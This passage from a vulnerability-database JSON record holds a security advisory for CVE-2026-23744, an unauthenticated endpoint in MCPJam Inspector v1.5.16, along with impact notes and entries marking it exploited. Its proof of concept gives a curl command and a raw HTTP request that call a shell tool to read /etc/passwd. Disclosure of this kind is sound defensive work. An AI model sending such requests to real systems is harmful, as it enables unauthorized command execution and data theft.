HOSTED_MODE deployment)\n* Knowledge or enumeration of a valid `serverId` (common values: \"local\", \"default\", \"asana\", \"github\", \"notion\")\n\n**No authentication, authorization, or request validation is performed.**\n\n### PoC\nRun MCPJam using below command:\n\n```bash\nnpx @mcpjam/inspector@latest\n```\n\nThen Install an MCP server allowing to run system command. I used the following MCP server as an example which allows running system commands: [[mac-shell-mcp](https://github.com/cfdude/mac-shell-mcp)](https://github.com/cfdude/mac-shell-mcp).\n\nYou can invoke this MCP server through MCPJam directly without authentication through the following HTTP request. Below is the curl request, and notice that it doesn't require any authentication or the authorization bearer token in the header:\n\n```bash\ncurl --path-as-is -i -s -k -X POST \\\n -H 'Host: 127.0.0.1:6274' \\\n -H 'Content-Type: application/json' \\\n -d '{\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"execute_command\",\n \"arguments\": {\n \"command\": \"cat\",\n \"args\": [\"/etc/passwd\"]\n }\n }\n}' \\\n 'http://127.0.0.1:6274/api/mcp/adapter-http/shell-mcp'\n\n```\n\n\n\n\n\n\n\nYou can also use Burp Proxy to send the below request directly:\n\n\n```http\nPOST /api/mcp/adapter-http/shell-mcp HTTP/1.1\nHost: 127.0.0.1:6274\nContent-Type: application/json\nContent-Length: 195\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"execute_command\",\n \"arguments\": {\"command\": \"cat\",\n\"args\":[\" /etc/passwd\"]}\n }\n }\n\n\n```\n\n\n\n\n\nThis issue was found on version `v1.5.16`\n\n\n\n\n\n### Impact\n\n\nThis vulnerability allows unauthorized remote attackers to execute arbitrary MCP tools without authentication, leading to complete compromise of the system when shell-enabled MCP servers are connected. The impact severity depends on the capabilities of the connected MCP servers:\n\n* **Unauthorized Tool Execution:** Attackers can invoke any MCP tool exposed by connected servers without authentication, bypassing all authorization controls.\n* **Data Exfiltration:** Unauthorized access to sensitive data through MCP resource reads, database queries, or file system operations.\n* **Remote Code Execution (RCE):** Direct system command execution through MCP servers like mac-shell-mcp, filesystem-mcp, or custom servers with command execution capabilities.\n* **Privilege Escalation:** If MCPJam Inspector runs with elevated privileges, attackers inherit those privileges for command execution.\n\n### Attack Scenarios:\n\n* **Local Network Attack:** Attacker on the same LAN (corporate network, coffee shop WiFi, shared workspace) can directly access exposed MCPJam endpoints.\n* **Cloud Deployment Attack:** HOSTED_MODE deployments without proper network isolation are accessible from the internet.\n* **Docker Misconfiguration:** Users running docker run -p 6274:6274 expose the vulnerability to anyone who can reach the host machine.\n", "creation_timestamp": "2026-06-12T18:31:30.000000Z"}, {"uuid": "97733f38-4250-462d-be51-7aa88377152e", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/d2f68af8-64d3-4b93-b2e1-2c45d3c95da0", "content": "", "creation_timestamp": "2026-06-19T12:45:36.125721Z"}, {"uuid": "a4c8c1d9-ad61-49e7-a68b-204f1d797931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "Telegram/O_vzfgb5tpNhGc4dFY5yEuw_msb6z_Oos8ooFDoWVZhaadQ", "content": "", "creation_timestamp": "2026-06-05T15:00:07.000000Z"}]}